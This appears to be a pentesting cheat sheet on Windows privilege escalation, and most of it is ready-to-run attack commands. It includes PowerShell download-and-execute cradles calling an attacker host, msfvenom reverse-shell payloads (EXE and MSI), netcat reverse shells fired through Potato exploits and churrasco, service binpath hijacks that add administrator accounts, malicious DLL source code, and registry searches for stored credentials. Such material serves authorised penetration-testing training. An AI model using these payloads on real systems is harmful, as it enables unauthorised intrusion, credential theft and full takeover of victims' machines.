Windows

Introduction

This section contains a set of techniques that can be used to perform privilege escalation on Windows systems.

Tools

This subsection contains valuable tools to identify potential privilege escalation vectors.

Note: Some tools require compilation, but you can download them already compiled in this link.

• Local Exploit Suggester: Metasploit module (post/multi/recon/local_exploit_suggester) for meterpreter enumerates the system looking for potential privilege escalation vectors.

• JAWS: Identifies potential privilege escalation vectors. It is written in PowerShell2.0 so it can be used on Windows 7 and above.

• WinPAES: General Windows enumeration and privilege escalation vectors.

• SeatBelt: Performs a number of "security checks": AMSIProviders, Antivirus, Sysmon, WindowsDefender, WindowsEventForwarding, McAfeeConfigs, InterstingProcesses (Needs compilation). Compiled here.

Seatbelt.exe -group=system
# runs the following commands:
#        AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
#        AuditPolicyRegistry, AutoRuns, Certificates, CertificateThumbprints,
#        CredGuard, DNSCache, DotNet, EnvironmentPath,
#        EnvironmentVariables, Hotfixes, InterestingProcesses, InternetSettings,
#        LAPS, LastShutdown, LocalGPOs, LocalGroups,
#        LocalUsers, LogonSessions, LSASettings, McAfeeConfigs,
#        NamedPipes, NetworkProfiles, NetworkShares, NTLMSettings,
#        OptionalFeatures, OSInfo, PoweredOnEvents, PowerShell,
#        Processes, PSSessionSettings, RDPSessions, RDPsettings,
#        SCCM, Services, Sysmon, TcpConnections,
#        TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
#        WifiProfile, WindowsAutoLogon, WindowsDefender, WindowsEventForwarding,
#        WindowsFirewall, WMI, WMIEventConsumer, WMIEventFilter,
#        WMIFilterBinding, WSUS

• SharUp: Tool that performs security checks. (Needs compilation). Compiled here.

• ProcMon: Tool used to check for missing DLLs in a process/service.

• AutoRuns: GUI tool that displays the machine's autoruns.

• PowerUp: Tool for privilege escalation based on failures in the Windows configuration. (It gets hanging quite often)

echo IEX(New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/PowerUp.ps1') | powershell -noprofile -
powershell.exe -nop -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/PowerUp.ps1');Invoke-AllChecks"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

SeImpersonatePrivilege

In this subsection, you will find how to exploit the Windows privilege SeImpersonatePrivilege in order to become an Administrator. Nonetheless, there are more Windows privileges that you can use to become an Administrator, as you can see in the following list.

Depending on the Windows version, you will need to use different exploits. In order to obtain the Windows version execute the following command.

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

• If the machine is either Windows 7, 8, 10 or Windows Server 2008 and 2012, try Hot Potato.

• If the machine is either < Windows 10 1809 or < Windows Server 2019, try Juicy Potato.

• If the machine is either >= Windows 10 1809 or >= Windows Server 2019, try Rogue Potato.

• For more updated versions, try PrintSpoofer.

Hot Potato

1. Download the exploit.

2. Generate a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> -f exe > shell.exe

3. Set a listening port.

nc -nlvp <LISTENING_PORT>

4. Execute the exploit.

Potato.exe -ip <Victims_IP> -cmd "C:\Windows\Temp\shell.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

Hot Potato (PowerShell)

There is a version of Hot Potato for PowerShell called Tater.

powershell.exe -ep bypass "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Tater.ps1'); Invoke-Tater -Trigger 1 -Command 'C:\Users\user\Desktop\nc.exe <ATTACKER_IP> <LISTENING_PORT> -e cmd.exe'"

Juicy Potato

1. Download the exploit

2. Execute the exploit.

This is the default command, although it does not usually work.

JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\windows\\temp\\nc.exe -e cmd.exe <ATTACKER_IP> <LISTENING_PORT>" -t *

Depending on the OS version, it is necessary to use CLSIDs. These can be found in this repository.

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe <LISTENING_IP> <LISTENING_PORT>" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

Rogue Potato

This exploit is more complicated and requires more steps. Thus, here you have different PoCs that you can try to escalate privileges.

• PoC1

• PoC2

PrintSpoofer

1. Download the exploit.

2. Execute it

PrintSpoofer.exe -i -c "cmd.exe"

Windows Services

Windows systems can contain installed services that are being executed by privileged accounts. However, they can have misconfigurations that allow an attacker to escalate privileges.

Furthermore, look for service permissions like SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, SERVICE_STOP, SERVICE_START because they will help you modify the service configuration files, and if you have the last two permissions, you could restart a service executing the file you have overwritten.

Finally, in this subsection, you will find techniques to exploit services misconfigurations to escalate privileges.

General commands

These commands are used to retrieve or modify information about services.

# Shows the owner of each service
tasklist /v
# Query the configuration of a service
sc.exe qc <ServiceName> 
# Current status of a service
sc.exe query <ServiceName> 
# Modify the configuration of a service
sc.exe config <ServiceName> <option>=<Value>
# Start/Stop a service
net start/stop <ServiceName> 

Weak Windows Service Permissions

This technique consists of modifying the attribute binpath of services, with the purpose of executing a different executable or command at the service startup.

There are several tools that can help you to identify Weak Service Permissiones:

• AccessChk

  • u: Suppress warning and errors.

  • w: Shows objects with write access

  • c: Display service name

  • v: Verbose

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# In addition, the tool accesschk allows viewing the effective permissions on files, registry keys, logs, kernel objects...
accesschk64.exe -wvu <FolderPath>
# FOLDER PERMISSIONS
accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
accesschk.exe /accepteula -uwdqs "Everyone" C:\
# FILE PERMISSIONS
accesschk.exe /accepteula -uwqs  "Authenticated Users" C:\*.*
accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*

• PowerUp

Get-ModifiableService -Verbose

• Get-ServiceAcl

Import-Module .\Get-ServiceAcl.ps1
Get-ServiceAcl -Name VulnService2 | select -expand Access

• SharpUp

.\SharpUp.exe audit ModifiableServices

After enumerating the services whose attribute BINARY_PATH_NAME is modifiable, edit the binpath by the file or command you want to be executed.

# Alternative 1 (FILE_PATH)
sc config <SERVICE_NAME> binpath="<FILE_PATH>"
# Alternative 1 (Execute command)
sc config <SERVICE_NAME> binpath="cmd.exe /c net user <USER> <PASSWORD> /add && net localgroup Administrators <USER> /add"

Then, restart the service.

net stop <SERVICE_NAME> && net start <SERVICE_NAME>

Weak Service Binary Permissions

This vulnerability is similar to the previous one, but instead of weak permissions on the service, it is on the service binary itself so that it can be overwritten.

• SharpUp

.\SharpUp.exe audit ModifiableServiceBinaries

• PowerUp

# Gets services where the current user can write to the service binary path or its config
Get-ModifiableServiceFile -Verbose

Unquoted Service Path

Suppose the binary service path is not enclosed on quotes and contains white spaces. An attacker could place an executable in an upper directory within the binary path, being executed before the actual executable.

For example, the binary path C:\Program Files\Proof of Concept\Vuln Service\executable.exe would be executed in the following order.

C:\Program.exe
C:\Program Files\Proof.exe
C:\Program Files\Proof of Concept\Vuln.exe
C:\Program Files\Proof of Concept\Vuln Service\executable.exe

So, if an attacker can create files in one of the upper directories, it will gain code execution.

To obtain the vulnerable services to Unquoted Service Path there are two options.

For the following examples we will use the example service called "unquotedsvc".

• WMIC

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

• PowerUp

Get-UnquotedService -Verbose

Then, with the command Get-Acl '<DIR>' | fl you can see which users have access to the folder.

• ShapUp

.\SharpUp.exe audit UnquotedServicePath

All the system users have full control so that the file common.exe can be added to the folder Common Files .

Finally, the malicious file will be executed once the service "unquotedsvc" is restarted.

sc stop unquotedsvc
sc start unquotedsvc

DLL Hijacking

DLLs are libraries containing code and data with the property of being used concurrently by several programs. If an attacker can overwrite some of the DLLs of a service, it could obtain code execution.

Using PowerUp you can obtain libraries on which you have write permissions. In this case is C:\Temp\wlbsctrl.dll.

To replace the DLL you need to create another DLL, which can be found at the following link, replacing the command you want to execute.

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);
    }
    return TRUE;
}

Then, you need to execute the following commands to compile the library.

sudo apt update && sudo apt install mingw-w64 -y
x86_64-w64-mingw32-gcc windows_dll.c -shared -o wlbsctrl.dll

Finally, overwrite the DLL and restart the service:

sc stop dllsvc & sc start dllsvc

Search for credentials

A pentester can search for credentials stored in registry or windows files with the following commands.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" /f password /t REG_SZ /s
# Search for credentials in the HKEY_LOCAL_MACHINE hive
reg query HKLM /f password /t REG_SZ /s
# Searches for credentials in the HK_CURRENT_USER Hive
reg query HKCU /f password /t REG_SZ /s 
# Find config files that usually have stored credentials
dir c:\*vnc.ini /s /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\*vnc.ini /s /b /s /b | findstr /si *vnc.ini
# Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config* 

In addition, credentials can also be found in the following:

Files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

Registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password" 
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 
# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" 
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" 

RunAs

Cached credentials of domain users for a specific machine may be found in the session of a compromised user.

The following command is used to list the cached credentials:

C:\> cmdkey /list
 
Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

Finally, in order to use the stored credential we need to execute the following command:

C:> C:\Windows\System32\runas.exe /user:domain\Administrator /savecred "<COMMAND or PROGRAM to be executed>"

Always Install Elevated

This policy allows any user to use elevated permissions for installing any program on the system. Thus, an attacker can create a malicious installer that would be executed with higher privileges gaining privilege escalation.

There are two options for detecting whether we can employ this privilege escalation.

• PowerUP

• Checking the registry values.

PS C:\Users\TCM> reg query HKLM\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
PS C:\Users\TCM> reg query HKCU\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

To exploit this configuration create a *.msi document with msfvenom and install it on the remote machine.

Note: It is possible that if you install the file using winexec it may not work because the user does not have permission to run it remotely. To fix this, you should use a remote desktop and run the manually generated installer.

msfvenom -p windows/shell_reverse_tcp lhost=<IP> lport=4444 exitfunc=thread -f msi -o shell.msi
C:\Users\TCM> msiexec /quiet /qn /i .\shell.msi

Delegation Tokens

The meterperer module incognito on merterpreter allows the attacker to extract available Delegation Tokens.

meterpreter> load incognito
meterpreter> list_tokens -u
Delegation Tokens Available
[...]
meterpreter> impersonate_token <LISTED_TOKEN>

Token Kidnapping

If an attacker has gained execution of code on a service with the ability to impersonate users or has access to the accounts "NETWORK SERVICE" or "LOCAL SERVICE", it could escalate privileges with churrasco.

churrasco.exe "nc.exe 10.10.14.2 1234 -e cmd.exe"

CVE-2019-1388 (hhupd)

An elevation of privilege vulnerability exists in the Windows certificate dialog box when it does not properly enforce user privileges, also known as the "Windows certificate dialog box elevation of privilege vulnerability". To exploit this vulnerability follow this video.

Kernel Exploits

In order to exploit Kernel vulnerabilities on windows, it is necessary to know if there are any patches or hotfixes already installed on the victim's system.

wmic qfe
# Brief
wmic qfe get Caption,Description,HotFixID,InstalledOn 
Get-Hotfix

It is also important, to check the system architecture. Which can be obtained as follows:

# CMD
SET Processor
# PowerShell
[Environment]::Is64BitProcess

Vanilla PowerShell is run on 32-bit so 64-bit exploits will not work, for this you need to use 64-bit PowerShell found at:

C:\Windows\sysnative\WindowsPowershell\v1.0\powershell.exe

Exploit listing

In this listing, you will find a set of compiled exploits, ready to be executed.

For the OSCP, you can use this listing, that contains a subset of exploits to escalate privileges.

Suggested tools

There are different tools capable of finding which exploits work for the version of Windows under attack.

Windows Exploit Suggester

Windows Exploit Suggester detects possible missing patches on the target. It also notifies the user if public exploits and Metasploit modules are available for missing bulletins. (Requires Python2.7).

In order to use the tool, it is necessary to run systeminfo on the victim machine and copy it to a file on the attacking machine.

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DOWNLADED_DATABASE> --systeminfo <VICTIMS_SYSTEMINFO> 

Watson

Watson lists Windows HotFixes and suggests exploits for privilege escalation. However, it requires prior compilation.

Nonetheless, you can download the compiled version here.

Sherlock

Sherlock quickly finds missing windows patches to escalate privileges, but it takes a while to finish.

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/Sherlock.ps1');Find-AllVulns"

References

• Potatoes - Windows Privilege Escalation

• Always Install Elevated

• Windows PrivEsc Arena [TryHackeMe]

• Windows PrivEsc [TryHackMe]

• Token kidnapping

• Windows Privilege Escalation Fundamentals

• Windows - Privilege Escalation [PayloadAllTheThings]